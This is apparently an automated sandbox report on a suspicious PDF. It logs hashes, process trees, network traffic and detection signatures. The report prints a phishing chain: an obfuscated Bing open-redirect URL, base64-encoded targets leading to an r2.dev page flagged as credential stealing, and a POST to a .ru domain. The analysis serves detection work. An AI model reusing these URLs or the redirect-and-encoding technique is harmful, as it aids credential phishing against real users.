Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xJwSq336bs.pdf

Overview

General Information

Sample name:xJwSq336bs.pdf
renamed because original name is a hash value
Original sample name:53cf6e9968a5234c923f2826d5e9fa97c880c3fd.pdf
Analysis ID:1467831
MD5:3c860412604778442a97627e84abc63b
SHA1:53cf6e9968a5234c923f2826d5e9fa97c880c3fd
SHA256:bb6e4fa5ab06f4c632734a62f0009901a4b6b32b4c71de65aa644c19c5e729ca
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious PDF
HTML page contains hidden URLs or javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7136 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\xJwSq336bs.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 3300 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7288 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1564,i,13095701672295818797,3944733196950927532,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 8164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1aHR0cHM6Ly9wdWItYWQ4YmRiYjMyMTY5NDkzNGE5YTIxOGVlYjY4Njg1NTkucjIuZGV2L2xpbmsuaHRtbCM&bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2020,i,6328722041011328787,10411392948838012152,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=HTTP Parser: Base64 decoded: https://menlologistics.com.ru///3365.php
Source: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=HTTP Parser: No favicon
Source: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.18.2.35 104.18.2.35
Source: Joe Sandbox ViewIP Address: 104.18.2.35 104.18.2.35
Source: Joe Sandbox ViewIP Address: 23.47.168.24 23.47.168.24
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.168.24
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Hp9snZF7dKOoUty&MD=YmpwYxfF HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /link.html HTTP/1.1Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /, HTTP/1.1Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: menlologistics.com.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /, HTTP/1.1Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Hp9snZF7dKOoUty&MD=YmpwYxfF HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: pub-ad8bdbb321694934a9a218eeb6868559.r2.dev
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: menlologistics.com.ru
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: unknownHTTP traffic detected: POST // HTTP/1.1Host: menlologistics.com.ruConnection: keep-aliveContent-Length: 17sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 19:06:01 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 89e163dc7a810f4d-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 19:06:03 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 89e163edf89dc466-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 19:06:04 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 89e163f34d79c327-EWR
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A0.1.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: chromecache_191.10.drString found in binary or memory: https://cdn.jsdelivr.net/npm/
Source: chromecache_191.10.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_194.10.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_191.10.drString found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
Source: chromecache_195.10.drString found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_191.10.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRj9z_hgFkFomQz6SE0hZ3jtkWaAArgdoZ8OOuYjfT4XQ&s
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#about
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#classic-cars
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#contact
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#electric-vehicles
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#faq
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#learn-more
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#modern-supercars
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#privacy
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#services
Source: chromecache_191.10.drString found in binary or memory: https://menlologistics.com.ru/#terms
Source: chromecache_191.10.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Source: chromecache_191.10.drString found in binary or memory: https://www.carlogos.org/uploads/2023/most-bought-super-cars-in-illinois-huracan.jpg
Source: chromecache_195.10.drString found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: chromecache_191.10.drString found in binary or memory: https://www.experienceferrari.com/wp-content/uploads/2024/04/1968-Dodge-Charger-RT.jpg
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: classification engineClassification label: mal52.winPDF@41/56@12/8
Source: xJwSq336bs.pdfInitial sample: https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1ahr0chm6ly9wdwitywq4ymriyjmymty5ndkznge5ytixogvlyjy4njg1ntkucjiuzgv2l2xpbmsuahrtbcm&bwfyawuty2xhdwrllmjlz2luqg9tahnozxjicm9va2uucwmuy2e=
Source: xJwSq336bs.pdfInitial sample: https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1aHR0cHM6Ly9wdWItYWQ4YmRiYjMyMTY5NDkzNGE5YTIxOGVlYjY4Njg1NTkucjIuZGV2L2xpbmsuaHRtbCM&bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-07-04 15-05-33-503.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\xJwSq336bs.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1564,i,13095701672295818797,3944733196950927532,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1aHR0cHM6Ly9wdWItYWQ4YmRiYjMyMTY5NDkzNGE5YTIxOGVlYjY4Njg1NTkucjIuZGV2L2xpbmsuaHRtbCM&bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2020,i,6328722041011328787,10411392948838012152,262144 /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1564,i,13095701672295818797,3944733196950927532,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2020,i,6328722041011328787,10411392948838012152,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
